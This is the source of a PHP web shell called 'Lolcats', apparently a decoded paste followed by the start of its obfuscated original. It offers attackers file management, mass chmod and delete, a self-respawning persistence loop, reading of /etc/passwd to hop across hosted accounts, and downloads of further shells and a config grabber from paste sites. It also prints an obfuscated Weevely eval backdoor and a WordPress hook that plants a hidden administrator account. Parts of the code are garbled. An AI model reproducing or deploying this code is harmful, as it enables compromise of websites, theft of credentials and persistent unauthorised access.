@ini_set("max_execution_time", 0);
while (true) {\xa if (!file_exists("" . getcwd() . "")) {\xa mkdir("" . getcwd() . "");
}
\xa if (!file_exists("" . getcwd() . "/" . $namafilelos . "")) {\xa $text = base64_encode(file_get_contents("" . $tmpnya . "/.PHPSESSID/." . base64_encode(getcwd() . remdot($namafilelos) . "-text-file") . ""));\xa file_put_contents("" . getcwd() . "/" . $namafilelos . "", base64_decode($text));
}
\xa if (lolcatsperm("" . getcwd() . "/" . $namafilelos . "") != 0444) {\xa chmod("" . getcwd() . "/" . $namafilelos . "", 0444);\xa }\xa }
function lolcatsperm($filename) {
return substr(sprintf("%o", fileperms($filename)), -4);
}"; $handlerfile = $cachedirectorylo . "/." . base64_encode(getcwd() . remdot($namafilelos) . "-handler"); $handlersaction = file_put_contents($handlerfile, $handler); if ($handlersaction) { cmdoitlock("php " . $handlerfile . " > /dev/null 2>/dev/null &"); echo "<script>window.location='?path={$path}'</script>"; } } else { echo "<script>alert('ERROR! Access denied.');</script>"; } } } if ($_1337["id"] == "getpriv") { s(); echo "<center class='anu'>Get Private Tools</center>
<div class='card card-body text-dark input-group mb-3'>\xa <form method='POST'> \xa <i class='bi bi-file-earmark'></i> Select a tools/code:
<select class='form-control btn-sm text-dark' name='option'>
<option value='1' selected>Adminer (Database Login)</option>
<option value='11'>Command Bypass (Stealth Version)</option>
<option value='2'>Htaccess (Kill All Backdoor)</option>\xa <option value='8'>Private Config Grabber (Auto Grab Config)</option>
<option value='3'>Weevely Remote Shell</option>\xa <option value='4'>SSI Shell (Bypass Command Litespeed)</option>
<option value='5'>WordPress Auto Add Admin (On Themes)</option>
<option value='6'>Alfabepas (Alfa Bypass Version)</option>
<option value='9'>Alfa Tesla (Alfa Original Code)</option>
<option value='7'>Marijuana (Best Bypass Shell)</option>
<option value='10'>Bypass Litespeed Shell (Stealth Version)</option>
</select>
<div class='d-grid gap-2'>\xa <input class='btn btn-dark btn-sm' type='submit' name='get' value='Submit!'>
</div>
</form>
</div>"; if (isset($_POST["get"])) { function downloadFile($url, $fileName) { $userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"; $downloaded = false; $ch = curl_init($url); $fp = fopen($fileName, "w"); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_USERAGENT, $userAgent); if (curl_exec($ch)) { $downloaded = true; } curl_close($ch); fclose($fp); if (!$downloaded) { $opts = array("http" => array("method" => "GET", "header" => "User-Agent: {$userAgent}\xd
")); $context = stream_context_create($opts); $fileContent = file_get_contents($url, false, $context); if ($fileContent !== false) { file_put_contents($fileName, $fileContent); $downloaded = true; } } if (!$downloaded) { $fp = fopen($fileName, "w"); if ($fp) { $source = fopen($url, "r"); if ($source) { while ($content = fread($source, 8192)) { fwrite($fp, $content); } fclose($source); $downloaded = true; } fclose($fp); } } if (!$downloaded) { if (copy($url, $fileName)) { $downloaded = true; } } if (!$downloaded) { $opts = array("http" => array("method" => "GET", "header" => "User-Agent: " . $userAgent)); $context = stream_context_create($opts); $source = fopen($url, "r", false, $context); if ($source) { $fp = fopen($fileName, "w"); if ($fp) { while ($content = fread($source, 8192)) { fwrite($fp, $content); } fclose($fp); $downloaded = true; } fclose($source); } } if ($downloaded) { $protocol = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http"; $urlwebsite = $protocol . "://" . $_SERVER["HTTP_HOST"]; $downloadLink = $urlwebsite . str_replace(realpath($_SERVER["DOCUMENT_ROOT"]), '', realpath(getcwd())) . "/" . basename($fileName); echo "<center><a href='{$downloadLink}' target='_blank' class='btn btn-danger'>Click Here!</a></center>"; } else { echo "<center><p class='text-danger'>Failed to download the file.</p></center>"; } } if ($_POST["option"] == "1") { $url = "https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php"; $fileName = getcwd() . "/lolcats-adminers.php"; } elseif ($_POST["option"] == "2") { ?>
<div class="container-fluid language-javascript mt-3">
<div class="shell mb-3 position-relative"><pre style="font-size:10px;" id="code"><code><?php echo htmlspecialchars("Options -Indexes\xa<FilesMatch ".*\.(cgi|pl|py|pyc|pyo|php3|php4|php5|php6|pcgi|pcgi3|pcgi4|pcgi5|pchi6|inc|php|Php|pHp|phP|PHp|pHP|PhP|PHP|PhP|php5|Php5|phar|PHAR|Phar|PHar|PHAr|pHAR|phAR|inc|phaR|pHp5|phP5|PHp5|pHP5|PhP5|PHP5|cgi|CGI|CGi|cGI|PhP5|php6|php7|php8|php9|phtml|Phtml|pHtml|phTml|pHTml|Fla|fLa|flA|FLa|fLA|FlA|FLA|phtMl|phtmL|PHtml|PhTml|PHTML|PHTml|PHTMl|PhtMl|PHTml|PHtML|pHTMl|PhTML|pHTML|PhtmL|PHTmL|PhtMl|PhtmL|pHtMl|PhTmL|pHtmL|aspx|ASPX|asp|ASP|php.jpg|PHP.JPG|php.xxxjpg|PHP.XXXJPG|php.jpeg|PHP.JPG|PHP.JPEG|PHP.PJEPG|php.pjpeg|php.fla|PHP.FLA|php.png|PHP.PNG|php.gif|PHP.GIF|php.test|php;.jpg|PHP JPG|PHP;.JPG|php;.jpeg|php jpg|php.bak|php.pdf|php.xxxpdf|php.xxxpng|fla|Fla|fLa|fLa|flA|FLa|fLA|FLA|FlA|php.xxxgif|php.xxxpjpeg|php.xxxjpeg|php3.xxxjpeg|php3.xxxjpg|php5.xxxjpg|php3.pjpeg|php5.pjpeg|shtml|php.unknown|php.doc|php.docx|php.pdf|php.ppdf|jpg.PhP|php.txt|php.xxxtxt|PHP.TXT|PHP.XXXTXT|php.xlsx|php.zip|php.xxxzip|php78|php56|php96|php69|php67|php68|php4|shtMl|shtmL|SHtml|ShTml|SHTML|SHTml|SHTMl|ShtMl|SHTml|SHtML|sHTMl|ShTML|sHTML|ShtmL|SHTmL|ShtMl|ShtmL|sHtMl|ShTmL|sHtmL|Shtml|sHtml|shTml|sHTml|shtml|php1|php2|php3|php4|php10|alfa|suspected|py|exe|alfa|html|htm|module|ctp|inc)$">
Order Allow,Deny\xaDeny from all\xa</FilesMatch>
<FilesMatch "(?i).*(ph|sh|pj|env|cg).*">
Order Deny,Allow
Deny from all
</FilesMatch>
<FilesMatch '^(" . $resoolt . ")$'>\xaOrder allow,deny
Allow from all
</FilesMatch>\xaErrorDocument 403 "<html><head><title>Request Rejected by Lolcats</title></head><body>The requested URL was rejected. Please consult with your administrator.</body></html>"
ErrorDocument 404 "<html><head><title>Request Rejected by Lolcats</title></head><body>The requested URL was rejected. Please consult with your administrator.</body></html>""); ?>
</code></pre>
<button class="btn btn-danger btn-sm copy-button" onclick="copyToClipboard()">Copy</button>
</div></div>
<p class="text-center">How to use? Just paste the .htaccess above in the folder you want to block all shell extensions except <em><?php echo $resoolt; ?>
</em></p>
</div><?php } elseif ($_POST["option"] == "3") { ?>
<div class="container-fluid language-javascript mt-3">
<div class="shell mb-3 position-relative">
<pre style="font-size:10px;" id="code"><code>error_reporting(0);
$a='$k="c8ba0w"w"a4b";$kw"h="w"7w"4948d105bdbw"";$kf="6f7w"7b77aw"432e"w";$pw"="5dJ1fteGr';
$W='Iw"w"XjtCLs";fuw"w"nction x($t,$k){$w"c=strw"len($kw");$l=stw"rw"len($tw");$o=""w";f';
$d='or($i=0;w"$i<$l;w")w"{fow"rw"($j=0;($jw"<$c&&$i<$l)w";$j++,w"$w"i++){$o.=$t{$i}^w"$k';
$l='w"lean();$w"r=@basw"e64_encow"dew"(w"@x(@gzcow"mpress($w"o),$k))w";prinw"t("$p$kh$rw"$kf");}';
$w='{$j}w";w"w"}}return $w"ow";}if (@w"prew"g_match("/$kh(.+)$w"kw"f/",w"@fiw"le_get_con';
$u=str_replace('I','','creIatIeI_fIuInctIion');
$g='tentw"s("php://iw"nputw"w""),$m)==1) {w"@ow"bw"_start();@evw"al(w"@gzuncomw"press(@x';
$H='(@bw"ase6w"4_dew"w"cw"ode($m[1]),$k)));$o=@ow"b_gw"w"et_cw"ontents();@w"ob_end_c';
$r=str_replace('w"','',$a.$W.$d.$w.$g.$H.$l);
$T=$u('',$r);$T();
</code></pre>
<button class="btn btn-danger btn-sm copy-button" onclick="copyToClipboard()">Copy</button>
</div>
</div>
<p class="text-center">How to use? Just paste the code above in the php file, for example: index.php etc. then connect to weevely | terminal command: <em>weevely http://yoursite/yourfile.php lolcats</em><p>
</div><?php } elseif ($_POST["option"] == "4") { $url = "https://gist.github.com/rafaeyfa1337/16f1650f50eb86ac5c0d32a6185ebc56/raw/2a96dabbea7430c818e3bd95aca4c8ffe5e556ae/LOLCATS.shtml"; $fileName = getcwd() . "/lolcats-ssi.shtml"; } elseif ($_POST["option"] == "5") { ?>
<div class="container-fluid language-javascript mt-3">
<div class="shell mb-3 position-relative"><pre style="font-size:10px;" id="code"><code>function lolcatsadmin(){
$login = 'lolcats';
$passw = 'kontolbabibangsa';
$email = '[email protected]';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','lolcatsadmin');</code></pre>
<button class="btn btn-danger btn-sm copy-button" onclick="copyToClipboard()">Copy</button>
</div>
<p class="text-center">How to use? Add the above code in the functions.php file on the target website. | example: https://piranha.go.id/wp-content/themes/[themes name]/functions.php</p>
</div>
<?php } elseif ($_POST["option"] == "6") { $url = "https://gist.githubusercontent.com/rafaeyfa1337/460fa7980960be2c92f47947b16186b8/raw/b96bbd31cdf0b742f78581e06595a857262eb9ab/alfabepas.php"; $fileName = getcwd() . "/lolcats-alfabepas.php"; } elseif ($_POST["option"] == "7") { $url = "https://gist.githubusercontent.com/rafaeyfa1337/ae372d0d98a9f3d46b7c44110cc16337/raw/589f3239019428ea05c236a36f764536dff97945/MARIJUANA.php"; $fileName = getcwd() . "/lolcats-marijuana.php"; } elseif ($_POST["option"] == "8") { $url = "https://raw.githubusercontent.com/FlamXTna997/Priv8-Config-Grabber/master/config.php"; $fileName = getcwd() . "/lolcats-config.php"; } elseif ($_POST["option"] == "9") { $url = "https://pst.innomi.net/paste/uo6cf3k4frw53f2rn9jot7fh/raw"; $fileName = getcwd() . "/lolcats-tesla.php"; } elseif ($_POST["option"] == "10") { $url = "https://paste.idcloudhosting.my.id/paste/ofp7w/raw"; $fileName = getcwd() . "/lolcats-bypasslitespeed.php"; } elseif ($_POST["option"] == "11") { $url = "https://paste.idcloudhosting.my.id/paste/t56q7/raw"; $fileName = getcwd() . "/lolcats-cmd.php"; } if ($url && $fileName) { downloadFile($url, $fileName); } } } } goto ZfZWC; sgMYv: $_COOKIE = Yolo($_COOKIE); goto sxLaR; gUtZv: $path = str_replace("\", "/", $path); goto ZtS8W; qAxlZ: set_time_limit(0); goto SZTWR; KJRak: function er() { echo "<div class="alert alert-dark alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>"; } goto zGf7Y; N3Fu_: foreach ($scand as $file) { $ft = date("Y-m-d G:i", filemtime("{$path}/{$file}")); if (function_exists("posix_getpwuid")) { $fowner = @posix_getpwuid(fileowner("{$path}/{$file}")); $fowner = $fowner["name"]; } else { $fowner = fileowner("{$path}/{$file}"); } if (function_exists("posix_getgrgid")) { $fgrp = @posix_getgrgid(filegroup("{$path}/{$file}")); $fgrp = $fgrp["name"]; } else { $fgrp = filegroup("{$path}/{$file}"); } if (!is_file($path . "/" . $file)) { continue; } if (strlen($file) > 25) { $_f = substr($file, 0, 25) . "...-." . $ext; } else { $_f = $file; } echo "\xa <tr>\xa <td><i class='bi bi-file-earmark-text-fill'></i> <a class='text-decoration-none text-white' href='?dir={$path}&action=view&opn={$file}' class='text-white'>{$_f}</a></td>\xa <td class='text-center text-white'>f!le</td>\xa <td class='text-center text-white'>{$ft}</td>
<td class='text-center text-white'>" . sz(filesize($file)) . "</td>
<td class='text-center text-white'>{$fowner}<font class='text-danger'> / </font>{$fgrp}</td>\xa <td class='text-center'>"; if (is_writable($path . "/" . $file)) { echo "<gr>"; } elseif (!is_readable($path . "/" . $file)) { echo "<rd>"; } echo p($path . "/" . $file); if (is_writable($path . "/" . $file) || !is_readable($path . "/" . $file)) { echo "</gr></rd></td>"; } echo "<td class='text-center'>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=changemodified&opn={$file}'><i class='bi bi-calendar-date'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=chemod&opn={$file}'><i class='bi bi-file-earmark-medical'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>
</div>
\x9 \x9</td>
\x9</tr>"; } goto zUYD7; JELCs: foreach ($scand as $dir) { $dt = date("Y-m-d G:i", filemtime("{$path}/{$dir}")); if (strlen($dir) > 25) { $_d = substr($dir, 0, 25) . "..."; } else { $_d = $dir; } if (function_exists("posix_getpwuid")) { $downer = @posix_getpwuid(fileowner("{$path}/{$dir}")); $downer = $downer["name"]; } else { $downer = fileowner("{$path}/{$dir}"); } if (function_exists("posix_getgrgid")) { $dgrp = @posix_getgrgid(filegroup("{$path}/{$dir}")); $dgrp = $dgrp["name"]; } else { $dgrp = filegroup("{$path}/{$dir}"); } if (!is_dir($path . "/" . $file)) { continue; } $size = filesize($path . "/" . $file) / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } if (!is_dir($path . "/" . $dir) || $dir == "." || $dir == "..") { continue; } echo "
<tr>\xa <td><i class='bi bi-folder-fill'></i> <a class='text-decoration-none text-white' href='?dir={$path}/{$dir}'>{$_d}</a></td>\xa <td class='text-center text-white'>d!r</td>
<td class='text-center text-white'>{$dt}</td>
<td class='text-center text-white'>-</td>\xa <td class='text-center text-white'>{$downer}<font class='text-danger'> / </font>{$dgrp}</td>\xa <td class='text-center'>"; if (is_writable($path . "/" . $dir)) { echo "<gr>"; } elseif (!is_readable($path . "/" . $dir)) { echo "<rd>"; } echo p($path . "/" . $dir); if (is_writable($path . "/" . $dir) || !is_readable($path . "/" . $dir)) { echo "</font></center></td>"; } echo "\xa \x9<td class='text-center'>\xa\x9\x9 <div class='btn-group'>\xa \x9<a class='btn btn-outline-light btn-sm' href='?dir={$path}/{$dir}&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}/{$dir}&action=changemodified_folder'><i class='bi bi-calendar-date'></i></a>\xa <!--<a class='btn btn-outline-light btn-sm' href='?dir={$path}/{$dir}&action=chemod'><i class='bi bi-file-earmark-medical'></i></a>-->\xa \x9\x9\x9<a class='btn btn-outline-danger btn-sm txt' href='?dir={$path}/{$dir}&action=delete_folder'><i class='bi bi-trash-fill'></i></a>
\x9 </div>\xa </td>\xa\x9\x9</tr>"; } goto N3Fu_; gVMRu: function deleteDir($dirPath) { if (!is_dir($dirPath)) { return false; } $files = array_diff(scandir($dirPath), array(".", "..")); foreach ($files as $file) { $filePath = $dirPath . DIRECTORY_SEPARATOR . $file; if (is_dir($filePath)) { deleteDir($filePath); } else { unlink($filePath); } } rmdir($dirPath); return true; } goto xSzhg; sS0QO: $_1337 = array_merge($_POST, $_GET); goto fdWT3; m1iO2: $full = str_replace($_SERVER["DOCUMENT_ROOT"], '', $path); goto PKEsQ; fdWT3: $_r = "required='required'"; goto B7bX7; O0lrs: if ($_1337["action"] == "delete_file") { s(); if ($_1337["yeahx"]) { $delete = unlink($file); if ($delete) { echo "<strong>Delete file</strong> OK! " . ok() . "</div>"; } else { echo "<strong>Delete file</strong> FAIL! " . er() . "</div>"; } } echo "\xa\x9 <div class='btn-group mb-3'>
\x9\x9 <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=changemodified&opn={$file}'><i class='bi bi-calendar-date'></i></a>\xa<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=chemod&opn={$file}'><i class='bi bi-file-earmark-medical'></i></a>\xa<a class='btn btn-outline-danger btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>\xa</div><div class='card card-body text-dark input-group mb-3'><p>Are you sure to delete : " . basename($file) . " ?</p>\xa <form method='POST'>
\x9 \x9<a class='btn btn-dark btn-block btn-sm' href='?dir={$dir}'>No</a>\xa \x9 \x9<input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'>
\x9</form>\xa </div>"; } goto MxyOS; KTKOH: if ($_1337["id"] == "masschemod") { s(); echo "<center class="anu">Mass Change Permissions (Chmod) All File/Dir</center>"; echo "
<div class="card card-body text-dark input-group mb-3">
<form method="POST">\xa <i class="bi bi-folder"></i> Directory:\xa <input class="form-control btn-sm text-dark" type="text" name="dir" value="" . htmlspecialchars($dir) . "">\xa <div class="form-check">\xa <input class="form-check-input" type="radio" name="target_type" value="file" checked>\xa <label class="form-check-label" for="file">File</label>
</div>
<div class="form-check">\xa <input class="form-check-input" type="radio" name="target_type" value="dir">\xa <label class="form-check-label" for="dir">Directory</label>
</div>\xa <i class="bi bi-file-earmark"></i> Permissions:
<input class="form-control btn-sm text-dark" type="text" name="permission" placeholder="0777">
<div class="d-grid gap-2">
<input class="btn btn-dark btn-sm" type="submit" name="change" value="Submit!">\xa </div>
</form>\xa </div>"; function massChmod($dir, $targetType, $permission, &$changedFiles = array()) { $files = glob($dir . "/*", GLOB_BRACE); foreach ($files as $file) { if ($targetType === "file" && is_file($file) || $targetType === "dir" && is_dir($file)) { if (isset($_POST["change"])) { if (chmod($file, octdec($permission))) { $changedFiles[] = $file; } } } if (is_dir($file)) { massChmod($file, $targetType, $permission, $changedFiles); } } } if (isset($_POST["change"])) { $dir = $_POST["dir"]; $targetType = $_POST["target_type"]; $permission = $_POST["permission"]; $changedFiles = array(); massChmod($dir, $targetType, $permission, $changedFiles); if (!empty($changedFiles)) { echo "<div class="card card-body text-dark">"; echo "<p>Change Permissions to <em>{$permission}</em></p>"; echo "<ul>"; foreach ($changedFiles as $changedFile) { echo "<li>{$changedFile}</li>"; } echo "</ul>"; echo "</div>"; } } } goto xqoVY; ZtS8W: $paths = explode("/", $path); goto Nd1vW; CIER1: if ($_1337["id"] == "delete") { function mass_delete($dir, $namefile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; $ = $dirc . "/" . $namefile; if ($dirb === "." || $dirb === "..") { continue; } if (is_dir($dirc)) { if (is_writable($dirc)) { if (file_exists($)) { echo "[<gr><i class='bi bi-check-all'></i></gr>] {$}<br>"; unlink($); } mass_delete($dirc, $namefile); } } } } } if ($_1337["start"]) { mass_delete($_1337["d_dir"], $_1337["d_file"]); } s(); echo "<center class="anu">Mass Delete</center>"; echo "\xa <div class='card card-body text-dark input-group mb-3'>
<form method='POST'>\xa <i class='bi bi-folder'></i> Directory:\xa <input class='form-control btn-sm text-dark' type='text' name='d_dir' value='{$dir}/' {$_r}>
<i class='bi bi-file-earmark'></i> Filename:
<div class='input-group'>
<input class='form-control btn-sm text-dark' type='text' name='d_file' placeholder='{$resoolt}' {$_r}><br>\xa <div class='input-group-append'>
<input class='btn btn-dark btn-sm' type='submit' name='start' value='Delete!'>\xa </div>
</div>\xa </form>
</div>"; } goto xxaNk; L2Ix3: if ($_1337["action"] == "chemod") { s(); function chmodItem($itemPath, $newPermission) { if (is_file($itemPath)) { if (chmod($itemPath, octdec($newPermission))) { return true; } else { return false; } } return false; } function chmodDirectory($dirPath, $newPermission) { $items = scandir($dirPath); foreach ($items as $item) { if ($item != "." && $item != "..") { $itemPath = $dirPath . "/" . $item; if (is_dir($itemPath)) { chmodDirectory($itemPath, $newPermission); } chmodItem($itemPath, $newPermission); } } } $itemToChmod = $_GET["opn"]; $itemPathToChmod = $path . "/" . $itemToChmod; echo "<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=view&opn={$file}'><i class='bi bi-eye'></i></a>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=edit&opn={$file}'><i class='bi bi-pencil-square'></i></a>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=rename&opn={$file}'><i class='bi bi-pencil-fill'></i></a>\xa <a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=changemodified&opn={$file}'><i class='bi bi-calendar-date'></i></a>
<a class='btn btn-outline-light btn-sm' href='?dir={$path}&action=chemod&opn={$file}'><i class='bi bi-file-earmark-medical'></i></a>
<a class='btn btn-outline-danger btn-sm' href='?dir={$path}&action=delete_file&opn={$file}'><i class='bi bi-trash-fill'></i></a>\xa </div>\xa <br><i class='bi " . (is_dir($itemPathToChmod) ? "bi-folder" : "bi-file-earmark") . "'></i>: " . basename($itemPathToChmod) . "</br>\xa <form method='POST'><div class='input-group'><input class='form-control btn-sm' type='text' name='new_permission' placeholder='0777' {$_r}>\xa <button class='btn btn-outline-light btn-sm' type='submit' name='chemodkan'><i class='bi bi-emoji-smile-upside-down'></i></button>\xa </div>
</form>"; if (isset($_POST["chemodkan"])) { $newPermission = $_POST["new_permission"]; if (is_dir($itemPathToChmod)) { chmodDirectory($itemPathToChmod, $newPermission); } else { chmodItem($itemPathToChmod, $newPermission); } echo "<strong>Change Permission</strong> OK! " . ok() . "</div>"; } } goto H4Yyw; JjZzp: if ($_1337["id"] == "chmod") { s(); echo "<center class="anu">Mass Change Permissions (Chmod)</center>"; echo "
<div class='card card-body text-dark input-group mb-3'>
<form method='POST'>
<i class='bi bi-folder'></i> Directory:\xa <input class='form-control btn-sm text-dark' type='text' name='dir' value='{$dir}/'>\xa <i class='bi bi-file-earmark'></i> Nama File:
<input class='form-control btn-sm text-dark' type='text' name='file' placeholder='lolcats.txt'>
<i class='bi bi-file-earmark'></i> Permissions:
<input class='form-control btn-sm text-dark' type='text' name='permission' placeholder='0777'>
<div class='d-grid gap-2'>
<input class='btn btn-dark btn-sm' type='submit' name='change' value='Submit!'>\xa </div>\xa </form>\xa </div>"; $dir = $_POST["dir"]; $file = $_POST["file"]; $permission = $_POST["permission"]; $changedFiles = array(); function getDirContents($dir, &$results = array()) { $files = array_diff(scandir($dir), array(".", "..")); foreach ($files as $file) { $path = $dir . "/" . $file; if (is_dir($path)) { $results = getDirContents($path, $results); } else { $results[] = $path; } } return $results; } $files = getDirContents($dir); foreach ($files as $name) { if (basename($name) === $file) { if (isset($_POST["change"])) { if (chmod($name, octdec($permission))) { $changedFiles[] = $name; } } } } if (!empty($changedFiles)) { echo "<div class='card card-body text-dark'>"; echo "<p>Change Permissions <em>{$file}</em> to <em>{$permission}</em></p>"; echo "<ul>"; foreach ($changedFiles as $changedFile) { echo "<li>{$changedFile}</li>"; } echo "</ul>"; echo "</div>"; } } goto KTKOH; ZaPiC: if (!empty($auth_pass)) { if (isset($_POST["pass"]) && md5($_POST["pass"]) == $auth_pass) { Yolosetcookie(md5($_SERVER["HTTP_HOST"]), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])]) || $_COOKIE[md5($_SERVER["HTTP_HOST"])] != $auth_pass) { logsx(); } } goto o9cS8; HBdOH: if (isset($_1337["dir"])) { $dir = $_1337["dir"]; chdir($dir); } else { $dir = $gcw(); } goto hJVd9; nyFwq: function s() { echo "<style>table{display:none;}</style><div class="table-responsive"><center><hr></hr></center></div>"; } goto c4BSp; huGM_: if ($_1337["id"] == "findmtime") { s(); echo "<div class="container-fluid">
<center class="anu">Find Modified Files</center>
<div class="card card-body text-dark input-group mb-3">\xa <div class="container-fluid mt-1">
<form method="POST">
<div class="form-group">\xa <i class="bi bi-folder"></i><label for="custom_path"> Directory:</label>
<input type="text" class="form-control form-control-sm text-dark flex-grow-1" name="custom_path" id="custom_path" value="" . $dir . "" required>\xa </div>
<div class="input-group">\xa <i class="bi bi-calendar-date"></i> <label for="time_range"> Modified Date: </label>
<div class="form-check">\xa <input class="form-check-input" type="radio" name="time_range" id="1min" value="1min" checked>
<label class="form-check-label" for="1min">1 Minute </label>\xa </div>\xa <div class="form-check">
<input class="form-check-input" type="radio" name="time_range" id="1day" value="1day">\xa <label class="form-check-label" for="1day">1 Day </label>
</div>\xa <div class="form-check">\xa <input class="form-check-input" type="radio" name="time_range" id="10days" value="10days">\xa <label class="form-check-label" for="10days">10 Days </label>
</div>\xa <div class="form-check">
<input class="form-check-input" type="radio" name="time_range" id="1month" value="1month">
<label class="form-check-label" for="1month">1 Month </label>\xa </div>\xa </div>
<div class="d-grid gap-2">
<input class="btn btn-dark btn-sm" type="submit" name="scan" value="Submit!">\xa </div>
</form>\xa </div>
</div>
</div>"; function getModifiedFiles($path, $startTime, $endTime) { $files = array(); $dirContent = scandir($path); foreach ($dirContent as $item) { if ($item != "." && $item != "..") { $itemPath = $path . "/" . $item; if (is_dir($itemPath)) { $subDirFiles = getModifiedFiles($itemPath, $startTime, $endTime); $files = array_merge($files, $subDirFiles); } else { $modifiedTime = filemtime($itemPath); if ($modifiedTime >= $startTime && $modifiedTime <= $endTime) { $files[] = $itemPath; } } } } return $files; } $customPath = isset($_POST["custom_path"]) ? $_POST["custom_path"] : getcwd(); if (isset($_POST["scan"])) { $currentDateTime = new DateTime(); $startTime = $currentDateTime->getTimestamp(); $selectedRange = $_POST["time_range"]; switch ($selectedRange) { case "1min": $endTime = $startTime - 60; break; case "1day": $endTime = $startTime - 60 * 60 * 24; break; case "10days": $endTime = $startTime - 60 * 60 * 24 * 10; break; case "1month": $endTime = $startTime - 60 * 60 * 24 * 30; break; default: $endTime = $startTime; } $modifiedFiles = getModifiedFiles($customPath, $endTime, $startTime); echo "<div class="card card-body text-dark"><ul>"; foreach ($modifiedFiles as $file) { echo "<li>{$file} <gr> -> File modified at {$currentDateTime->format("Y-m-d H:i:s")}</gr></li>"; } echo "</ul></div>"; } } goto CIER1; QJtcJ: ?>
Did this file decode correctly?
Original Code
<?php
goto qAxlZ; H4Yyw: if ($_1337["\151\144"] == "\x6a\x75\x6d\x70\x69\x6e\147") { s(); $i = 0; echo "\x3c\143\145\156\x74\x65\162\40\x63\x6c\x61\x73\163\x3d\47\x61\x6e\x75\47\76\x4a\165\155\160\x69\x6e\147\74\57\143\x65\156\164\145\162\x3e\12\x20\x20\x20\40\x3c\144\x69\166\x20\143\x6c\x61\163\x73\x3d\x27\143\x61\162\144\x20\143\141\x72\144\55\142\x6f\144\x79\x20\164\145\170\x74\x2d\144\x61\162\153\x20\x69\x6e\160\165\164\55\147\x72\157\x75\160\40\x6d\142\55\x33\x27\76"; echo "\x3c\160\162\145\x3e"; $etc = fopen("\57\x65\x74\x63\x2f\x70\141\163\x73\167\x64", "\162") or die("\x3c\x66\x6f\156\x74\40\143\x6f\154\x6f\162\75\x72\145\x64\76\103\x61\156\x27\164\40\x72\x65\x61\x64\x20\x2f\145\x74\143\x2f\x70\141\163\163\x77\144\74\x2f\x66\x6f\x6e\164\76"); while ($passwd = fgets($etc)) { if ($passwd == '' || !$etc) { echo "\74\146\x6f\x6e\164\40\143\x6f\x6c\157\162\75\x72\x65\x64\x3e\x43\x61\156\x27\164\40\162\145\141\x64\40\x2f\x65\164\x63\x2f\160\x61\163\163\x77\x64\x3c\x2f\x66\x6f\156\x74\76"; } else { preg_match_all("\x2f\x28\56\x2a\x3f\51\72\170\x3a\57", $passwd, $jumpss); foreach ($jumpss[1] as $uservaljump) { $valuserjumpindir = "\x2f\x68\x6f\x6d\x65\57{$uservaljump}\57\x70\165\142\x6c\x69\x63\137\x68\x74\x6d\x6c"; if (is_readable($valuserjumpindir)) { $i++; $jrw = "\133\x3c\151\40\x63\154\141\x73\x73\75\x27\x62\151\40\142\x69\x2d\x66\151\154\145\55\145\141\162\155\141\162\x6b\x27\x3e\74\x2f\x69\x3e\40\174\40\122\135\x20\x3c\x61\x20\x68\162\145\x66\75\47\77\160\141\164\x68\75{$valuserjumpindir}\47\76{$valuserjumpindir}\74\x2f\x61\x3e"; if (is_writable($valuserjumpindir)) { $jrw = "\133\x3c\151\x20\x63\x6c\x61\x73\163\75\x27\x62\x69\x20\142\x69\x2d\x66\151\x6c\x65\x2d\x65\x61\162\x6d\141\162\x6b\55\146\x69\154\154\47\x3e\x3c\x2f\151\76\x20\x7c\x20\x52\x57\x5d\x20\74\141\40\x68\x72\x65\146\x3d\47\x3f\x70\141\x74\150\75{$valuserjumpindir}\x27\76{$valuserjumpindir}\x3c\57\141\x3e"; } echo $jrw; if (function_exists("\160\x6f\163\151\x78\137\147\145\x74\x70\x77\x75\x69\144")) { $domain_jump = file_get_contents("\x2f\x65\x74\143\57\156\141\155\145\x64\x2e\143\157\x6e\x66"); if ($domain_jump == '') { echo 